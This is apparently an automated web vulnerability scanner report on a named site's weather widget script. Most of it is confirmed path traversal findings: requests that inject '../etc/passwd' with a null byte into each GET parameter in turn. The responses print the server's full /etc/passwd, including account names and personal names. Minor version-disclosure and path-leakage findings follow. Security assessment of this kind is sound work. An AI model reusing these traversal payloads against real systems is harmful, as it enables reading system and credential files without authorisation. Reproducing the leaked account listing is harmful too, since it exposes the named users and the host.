(admin):/var/lib/gnats:/bin/shnobody:x:65534:65534:nobody:/nonexistent:/bin/shlibuuid:x:100:101::/var/lib/libuuid:/bin/shsyslog:x:101:103::/home/syslog:/bin/falsesshd:x:102:65534::/var/run/sshd:/usr/sbin/nologinjphilp:x:1000:1000:Jason Philp,,,:/home/jphilp:/bin/bashafarooq:x:1001:1001:Ahmed Farooq,,,:/home/afarooq:/bin/bashpostfix:x:103:106::/var/spool/postfix:/bin/falsedealwatch:x:1002:1003:,,,:/home/dealwatch:/bin/bash
- /weather/weather_widget.php

/weather/weather_widget.php CONFIRMED

http://www.ibegin.com/weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&small..

Parameters

Parameter Type Value
type GET js
country GET us
state GET Virginia
city GET Reston
smallicon GET 1
current GET 1
forecast GET 1
background_color GET ffffffffffff
color GET 000000
width GET 175
padding GET ../../../../../../../../../../../etc/passwdweather_widget.php
border_width GET 1
border_color GET 000000
font_size GET 11
font_family GET Verdana
showicons GET 1

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffffffffff&color=000000&width=175&padding=../../../../../../../../../../../etc/passwd%00weather_widget.php&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.ibegin.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 10:39:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 568
Content-Type: text/html


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shnobody:x:65534:65534:nobody:/nonexistent:/bin/shlibuuid:x:100:101::/var/lib/libuuid:/bin/shsyslog:x:101:103::/home/syslog:/bin/falsesshd:x:102:65534::/var/run/sshd:/usr/sbin/nologinjphilp:x:1000:1000:Jason Philp,,,:/home/jphilp:/bin/bashafarooq:x:1001:1001:Ahmed Farooq,,,:/home/afarooq:/bin/bashpostfix:x:103:106::/var/spool/postfix:/bin/falsedealwatch:x:1002:1003:,,,:/home/dealwatch:/bin/bash
- /weather/weather_widget.php

/weather/weather_widget.php CONFIRMED

http://www.ibegin.com/weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&small..

Parameters

Parameter Type Value
type GET js
country GET us
state GET Virginia
city GET Reston
smallicon GET 1
current GET 1
forecast GET 1
background_color GET ffffffffffff
color GET 000000
width GET 175
padding GET 10
border_width GET ../../../../../../../../../../../etc/passwdweather_widget.php
border_color GET 000000
font_size GET 11
font_family GET Verdana
showicons GET 1

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffffffffff&color=000000&width=175&padding=10&border_width=../../../../../../../../../../../etc/passwd%00weather_widget.php&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.ibegin.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 10:39:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 568
Content-Type: text/html


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shnobody:x:65534:65534:nobody:/nonexistent:/bin/shlibuuid:x:100:101::/var/lib/libuuid:/bin/shsyslog:x:101:103::/home/syslog:/bin/falsesshd:x:102:65534::/var/run/sshd:/usr/sbin/nologinjphilp:x:1000:1000:Jason Philp,,,:/home/jphilp:/bin/bashafarooq:x:1001:1001:Ahmed Farooq,,,:/home/afarooq:/bin/bashpostfix:x:103:106::/var/spool/postfix:/bin/falsedealwatch:x:1002:1003:,,,:/home/dealwatch:/bin/bash
- /weather/weather_widget.php

/weather/weather_widget.php CONFIRMED

http://www.ibegin.com/weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&small..

Parameters

Parameter Type Value
type GET js
country GET us
state GET Virginia
city GET Reston
smallicon GET 1
current GET 1
forecast GET 1
background_color GET ffffffffffff
color GET 000000
width GET 175
padding GET 10
border_width GET 1
border_color GET ../../../../../../../../../../../etc/passwdweather_widget.php
font_size GET 11
font_family GET Verdana
showicons GET 1

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffffffffff&color=000000&width=175&padding=10&border_width=1&border_color=../../../../../../../../../../../etc/passwd%00weather_widget.php&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.ibegin.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 10:39:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 568
Content-Type: text/html


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shnobody:x:65534:65534:nobody:/nonexistent:/bin/shlibuuid:x:100:101::/var/lib/libuuid:/bin/shsyslog:x:101:103::/home/syslog:/bin/falsesshd:x:102:65534::/var/run/sshd:/usr/sbin/nologinjphilp:x:1000:1000:Jason Philp,,,:/home/jphilp:/bin/bashafarooq:x:1001:1001:Ahmed Farooq,,,:/home/afarooq:/bin/bashpostfix:x:103:106::/var/spool/postfix:/bin/falsedealwatch:x:1002:1003:,,,:/home/dealwatch:/bin/bash
- /weather/weather_widget.php

/weather/weather_widget.php CONFIRMED

http://www.ibegin.com/weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&small..

Parameters

Parameter Type Value
type GET js
country GET us
state GET Virginia
city GET Reston
smallicon GET 1
current GET 1
forecast GET 1
background_color GET ffffffffffff
color GET 000000
width GET 175
padding GET 10
border_width GET 1
border_color GET 000000
font_size GET ../../../../../../../../../../../etc/passwdweather_widget.php
font_family GET Verdana
showicons GET 1

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffffffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=../../../../../../../../../../../etc/passwd%00weather_widget.php&font_family=Verdana&showicons=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.ibegin.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 10:39:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 568
Content-Type: text/html


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shnobody:x:65534:65534:nobody:/nonexistent:/bin/shlibuuid:x:100:101::/var/lib/libuuid:/bin/shsyslog:x:101:103::/home/syslog:/bin/falsesshd:x:102:65534::/var/run/sshd:/usr/sbin/nologinjphilp:x:1000:1000:Jason Philp,,,:/home/jphilp:/bin/bashafarooq:x:1001:1001:Ahmed Farooq,,,:/home/afarooq:/bin/bashpostfix:x:103:106::/var/spool/postfix:/bin/falsedealwatch:x:1002:1003:,,,:/home/dealwatch:/bin/bash
- /weather/weather_widget.php

/weather/weather_widget.php CONFIRMED

http://www.ibegin.com/weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&small..

Parameters

Parameter Type Value
type GET js
country GET us
state GET Virginia
city GET Reston
smallicon GET 1
current GET 1
forecast GET 1
background_color GET ffffffffffff
color GET 000000
width GET 175
padding GET 10
border_width GET 1
border_color GET 000000
font_size GET 11
font_family GET ../../../../../../../../../../../etc/passwdweather_widget.php
showicons GET 1

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffffffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=../../../../../../../../../../../etc/passwd%00weather_widget.php&showicons=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.ibegin.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 10:39:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 568
Content-Type: text/html


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shnobody:x:65534:65534:nobody:/nonexistent:/bin/shlibuuid:x:100:101::/var/lib/libuuid:/bin/shsyslog:x:101:103::/home/syslog:/bin/falsesshd:x:102:65534::/var/run/sshd:/usr/sbin/nologinjphilp:x:1000:1000:Jason Philp,,,:/home/jphilp:/bin/bashafarooq:x:1001:1001:Ahmed Farooq,,,:/home/afarooq:/bin/bashpostfix:x:103:106::/var/spool/postfix:/bin/falsedealwatch:x:1002:1003:,,,:/home/dealwatch:/bin/bash
- /weather/weather_widget.php

/weather/weather_widget.php CONFIRMED

http://www.ibegin.com/weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&small..

Parameters

Parameter Type Value
type GET js
country GET us
state GET Virginia
city GET Reston
smallicon GET 1
current GET 1
forecast GET 1
background_color GET ffffffffffff
color GET 000000
width GET 175
padding GET 10
border_width GET 1
border_color GET 000000
font_size GET 11
font_family GET Verdana
showicons GET ../../../../../../../../../../../etc/passwdweather_widget.php

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffffffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=../../../../../../../../../../../etc/passwd%00weather_widget.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.ibegin.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 10:39:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 568
Content-Type: text/html


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shnobody:x:65534:65534:nobody:/nonexistent:/bin/shlibuuid:x:100:101::/var/lib/libuuid:/bin/shsyslog:x:101:103::/home/syslog:/bin/falsesshd:x:102:65534::/var/run/sshd:/usr/sbin/nologinjphilp:x:1000:1000:Jason Philp,,,:/home/jphilp:/bin/bashafarooq:x:1001:1001:Ahmed Farooq,,,:/home/afarooq:/bin/bashpostfix:x:103:106::/var/spool/postfix:/bin/falsedealwatch:x:1002:1003:,,,:/home/dealwatch:/bin/bash
Apache Version Disclosure

Apache Version Disclosure
1 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /weather/weather_widget.php

/weather/weather_widget.php

http://www.ibegin.com/weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&small..

Extracted Version

2.2.14 (Ubuntu)

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffffffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.ibegin.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 10:39:23 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 426
Content-Type: text/html


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64document.write('<div style="background-color: #ffffffffffff; color: #000000; width: 175px; padding: 10px; border: 1px #000000 solid; text-align: center; line-height: 1.6em; font-size: 11px; font-family: Verdana;"><b>WEBMASTER of this website:</b> The HTML you used is now out-dated. Please re-copy the HTML from <a href="http://www.showmyweather.com/">ShowMyWeather.com</a> without modification. Once updated the widget will function properly within 30 minutes.</div>');
PHP Version Disclosure

PHP Version Disclosure
1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker can look for specific security vulnerabilities for the version identified. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.
- /weather/weather_widget.php

/weather/weather_widget.php

http://www.ibegin.com/weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&small..

Extracted Version

PHP/5.3.2-1ubuntu4.7

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffffffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.ibegin.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 10:39:23 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 426
Content-Type: text/html


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64document.write('<div style="background-color: #ffffffffffff; color: #000000; width: 175px; padding: 10px; border: 1px #000000 solid; text-align: center; line-height: 1.6em; font-size: 11px; font-family: Verdana;"><b>WEBMASTER of this website:</b> The HTML you used is now out-dated. Please re-copy the HTML from <a href="http://www.showmyweather.com/">ShowMyWeather.com</a> without modification. Once updated the widget will function properly within 30 minutes.</div>');
[Possible] Internal Path Leakage (*nix)

[Possible] Internal Path Leakage (*nix)
1 TOTAL
INFORMATION
Netsparker identified an internal path in the document.

Impact

There is no direct impact however this information can help an attacker during the exploitation of some other vulnerabilities.

Remediation

External References

- /weather/weather_widget.php

/weather/weather_widget.php

http://www.ibegin.com/weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&small..

Identified Internal Path(s)

/home/ibegin.com/public_html/weather/weather_widget.php

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffffffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.ibegin.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 10:39:23 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 426
Content-Type: text/html


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64document.write('<div style="background-color: #ffffffffffff; color: #000000; width: 175px; padding: 10px; border: 1px #000000 solid; text-align: center; line-height: 1.6em; font-size: 11px; font-family: Verdana;"><b>WEBMASTER of this website:</b> The HTML you used is now out-dated. Please re-copy the HTML from <a href="http://www.showmyweather.com/">ShowMyWeather.com</a> without modification. Once updated the widget will function properly within 30 minutes.</div>');